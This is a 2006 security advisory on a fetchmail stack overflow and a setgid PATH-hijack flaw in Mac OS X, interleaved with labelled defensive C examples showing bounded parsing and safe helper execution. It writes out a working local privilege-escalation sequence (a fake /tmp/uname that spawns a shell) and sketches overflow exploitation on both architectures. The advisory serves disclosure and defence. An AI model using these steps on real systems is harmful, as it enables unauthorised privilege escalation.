
DMA-2006-0801a.txt

Posted Aug 17, 2006
Authored by Kevin Finisterre | Site digitalmunition.com

fetchmail on Mac OSX versions 10.4.7 and below suffer from an arbitrary code execution flaw.

tags | advisory, arbitrary, code execution
systems | apple
SHA-256 | a79a85fa9c78b353f28bab9c307f950ae95726f9619a959e9e455eb143f10992

DMA[2006-0801a] - 'Apple OSX fetchmail buffer overflow'
Author: Kevin Finisterre
Vendor: http://www.apple.com/
Product: 'Mac OSX <=10.4.7'
References:
http://www.digitalmunition.com/DMA[2006-0801a].txt
http://www.digitalmunition.com/getpwnedmail-x86.pl
http://www.digitalmunition.com/getpwnedmail-ppc.pl
http://www.freebsd.org/cgi/query-pr.cgi?pr=83805
http://fetchmail.berlios.de/fetchmail-SA-2005-01.txt
http://www.securityfocus.com/bid/14349

Description:
fetchmail-SA-2005-01 states that 'In fetchmail-6.2.5 and older, very long UIDs can
cause fetchmail to crash, or potentially make it execute code placed on the stack.
In some configurations, fetchmail is run by the root user to download mail for
multiple accounts.' The authors of fetchmail made patches for these issues available
to the public on 2005-07-21.
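The defect described above is a unique-id longer than the buffer it was copied into. The following is an added example, not fetchmail's code, of how a POP3 UIDL response line ("<msgnum> <unique-id>") can be parsed into a fixed-size buffer so that an over-long identifier is rejected instead of overflowing. The limit comes from RFC 1939, which bounds a unique-id to 1..70 printable ASCII characters; the names (uidl_entry, parse_uidl_line, UID_MAX) and the sample lines are this example's own.

```c
/*
 * Added example, not fetchmail's code: bounded parsing of a POP3 UIDL response
 * line ("<msgnum> <unique-id>") into a fixed-size buffer. The defence against
 * the fetchmail-SA-2005-01 bug is to measure and validate before copying, and
 * to reject anything over-long rather than truncate or overflow. RFC 1939
 * bounds unique-ids to 1..70 printable ASCII characters, which is the limit
 * used here. The names (uidl_entry, parse_uidl_line, UID_MAX) are this
 * example's own.
 */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define UID_MAX 70                   /* RFC 1939: unique-id is 1 to 70 characters */

struct uidl_entry {
    unsigned long msgnum;
    char uid[UID_MAX + 1];           /* +1 for the terminating NUL */
};

/* Parse one UIDL line. Returns 0 and fills *out on success, -1 if the line is
 * malformed or the unique-id is empty, over-long or not printable ASCII. */
int parse_uidl_line(const char *line, struct uidl_entry *out)
{
    char *end;
    errno = 0;
    unsigned long num = strtoul(line, &end, 10);
    if (end == line || errno != 0 || *end != ' ')
        return -1;                   /* no message number, or no single space after it */

    const char *uid = end + 1;
    size_t len = strcspn(uid, "\r\n");   /* length up to the line ending, if any */
    if (len == 0 || len > UID_MAX)
        return -1;                   /* empty or over-long: refuse, do not copy */

    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)uid[i];
        if (c < 0x21 || c > 0x7e)    /* RFC 1939: printable ASCII, no spaces */
            return -1;
    }

    out->msgnum = num;
    memcpy(out->uid, uid, len);      /* bounded: len <= UID_MAX, buffer is UID_MAX + 1 */
    out->uid[len] = '\0';
    return 0;
}

/* Demonstration helper: parse a line and compare it with the expected fields.
 * Returns 1 when the line parses and matches, 0 otherwise. */
int parse_matches(const char *line, unsigned long msgnum, const char *uid)
{
    struct uidl_entry e;
    if (parse_uidl_line(line, &e) != 0)
        return 0;
    return e.msgnum == msgnum && strcmp(e.uid, uid) == 0;
}

/* Demonstration helper: build a line whose unique-id is n bytes of 'A' and parse
 * it, standing in for a server that sends an over-long UID. Returns the parser's
 * result. */
int parse_uid_of_length(size_t n)
{
    char *line = malloc(n + 5);      /* "1 " + n bytes + "\r\n" + NUL */
    if (line == NULL)
        return -1;
    memcpy(line, "1 ", 2);
    memset(line + 2, 'A', n);
    memcpy(line + 2 + n, "\r\n", 3); /* 3 bytes: CR, LF and the terminating NUL */
    struct uidl_entry e;
    int rc = parse_uidl_line(line, &e);
    free(line);
    return rc;
}

int main(void)
{
    /* Constructed sample lines: one well-formed, one from a hostile server. */
    const char *ok = "1 whqtswO00WBw418f9t5JxYwZ\r\n";
    printf("normal line: %s\n",
           parse_matches(ok, 1, "whqtswO00WBw418f9t5JxYwZ") ? "accepted" : "rejected");
    printf("4096-byte UID: %s\n",
           parse_uid_of_length(4096) == 0 ? "accepted" : "rejected");
    return 0;
}
```

The point of the shape is that the only copy into the fixed buffer happens after the length has been checked against the buffer's capacity, so a server-controlled field can make the parser fail but can never make it write past the end of `uid`.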

In defiance of a 'very proactive approach to security', Apple's OSX remained unpatched
for approximately one year after the vendor-supplied patches were made available.
Shortly after the vendor disclosure of this bug, exploits were made available by The
Mantis Project (bannedit@frontiernet.net). Coincidentally, a recent paper was written
about exploiting buffer overflows and this vulnerability was used as an example:
http://packetstormsecurity.org/papers/attack/payload-rewrite_exploit.txt

As you may have guessed by now, exploitation on OSX is fairly trivial for both PowerPC
and x86 platforms. An attacker with local access can gain gid=6 (mail), and a remote
attacker may gain root under certain conditions.

k-fs-computer:~ kf$ ls *pwnedmail*
getpwnedmail-ppc.pl getpwnedmail-x86.pl

On PowerPC things were pretty straightforward. Simply overwriting the $pc and $lr
registers with the address of our stack-based shellcode was enough to snag egid=6. On
x86 we obviously have to deal with the NX-based protection. As shown plenty of times
in the past, a non-executable stack by itself is pretty useless. We can overwrite the
$eip register with the address of system() and we are pretty much good to go. A small
wrapper in /tmp can help finish the job and give us a shell with gid=6.

k-fs-computer:~ kfinisterre$ /usr/bin/fetchmail -p pop3 --fastuidl 1 localhost -P 1234
Enter password for kfinisterre@localhost:
sh-2.05b$ id
uid=501(kf) gid=501(kf) egid=6(mail) groups=6(mail), 81(appserveradm), 79(appserverusr), 80(admin)

In some cases fetchmail is run by the root user, so it may be possible to take remote
root with this vulnerability under certain circumstances.

As a side note, a previously undisclosed local vulnerability in fetchmail was discovered
while documenting the above-mentioned issue. Fetchmail no longer ships in a setgid
configuration, so this information should be of minimal impact. It is worth noting since
it may impact non-OSX machines in a similar manner.

k-fs-computer:~ kf$ export PATH=/tmp/:$PATH
k-fs-computer:~ kf$ cat > /tmp/uname
/usr/bin/id
/bin/sh -i
k-fs-computer:~ kf$ chmod +x /tmp/uname
k-fs-computer:~ kf$ /usr/bin/fetchmail -V
This is fetchmail release 6.2.5+IMAP-GSS+SSL+INET6
Fallback MDA: (none)
uid=501(kf) gid=501(kf) egid=6(mail) groups=6(mail), 81(appserveradm), 79(appserverusr), 80(admin)
sh-2.05b$

This issue is caused by the following code snippet:

    if (versioninfo)
    {
        ...
        /* this is an attempt to help remote debugging */
        /* bare command name: /bin/sh resolves it through the caller's PATH
           while the process still holds the setgid mail privilege */
        system("uname -a");
    }
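The snippet above is vulnerable because system() runs the command through /bin/sh with the caller's environment intact, so a PATH entry such as /tmp decides which "uname" executes with egid=6. As an added example, not fetchmail's code and not Apple's fix, the following C shows the hardening a setgid program needs before invoking an external helper: an absolute helper path, privileges dropped in the child before exec, and a fixed environment so the caller's PATH is never consulted. The names (run_helper, is_absolute_path, CLEAN_ENV, print_uname) are this example's own.

```c
/*
 * Added example, not fetchmail's code nor Apple's fix: the hardening a setgid
 * program needs before running an external helper such as uname. system() hands
 * the command to /bin/sh, which resolves a bare "uname" through the caller's
 * PATH and inherits the rest of the caller's environment, so whatever PATH
 * points at runs with the program's effective gid (egid=6 in the advisory).
 * This version instead (a) refuses anything but an absolute helper path,
 * (b) drops the effective gid back to the real gid in the child before exec,
 * and (c) execs with a fixed, minimal environment so the caller's PATH is never
 * consulted. The names (run_helper, is_absolute_path, CLEAN_ENV, print_uname)
 * are this example's own.
 */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Fixed environment for the child; nothing from the caller is inherited. */
static char *const CLEAN_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/* Accept only an absolute path without parent-directory traversal, so a bare
 * "uname" or a "/tmp/../..." path can never reach the exec. */
int is_absolute_path(const char *p)
{
    return p != NULL && p[0] == '/' && strstr(p, "/../") == NULL;
}

/* Run helper `path` with `argv`, privileges dropped and a clean environment.
 * Returns the child's exit status (127 if it could not be executed), or -1 if
 * the path was refused or fork/wait failed. */
int run_helper(const char *path, char *const argv[])
{
    if (!is_absolute_path(path))
        return -1;

    pid_t pid = fork();
    if (pid < 0)
        return -1;

    if (pid == 0) {
        /* Child: give up the setgid privilege first; if that fails, do not exec. */
        if (setgid(getgid()) != 0)
            _exit(127);
        execve(path, argv, CLEAN_ENV);
        _exit(127);                  /* only reached when execve itself failed */
    }

    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Safe counterpart of the advisory's system("uname -a"). */
int print_uname(void)
{
    char *const argv[] = { "uname", "-a", NULL };
    int rc = run_helper("/usr/bin/uname", argv);
    if (rc == 127)                   /* some systems ship uname only in /bin */
        rc = run_helper("/bin/uname", argv);
    return rc;
}

int main(void)
{
    /* Constructed scenario: PATH is poisoned as in the advisory's transcript.
     * The real uname still runs because the child never consults PATH. */
    setenv("PATH", "/tmp:/usr/bin:/bin", 1);
    return print_uname() == 0 ? 0 : 1;
}
```

Dropping the group before exec matters even with a clean environment: if the helper binary itself were ever replaced or misconfigured, it would still run only with the invoking user's own gid rather than as group mail.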

Both of the above problems are addressed by the latest Apple update.

Workaround:
Install the 2006-004 update
http://docs.info.apple.com/article.html?artnum=106704
http://docs.info.apple.com/article.html?artnum=61798
http://www.apple.com/support/downloads/
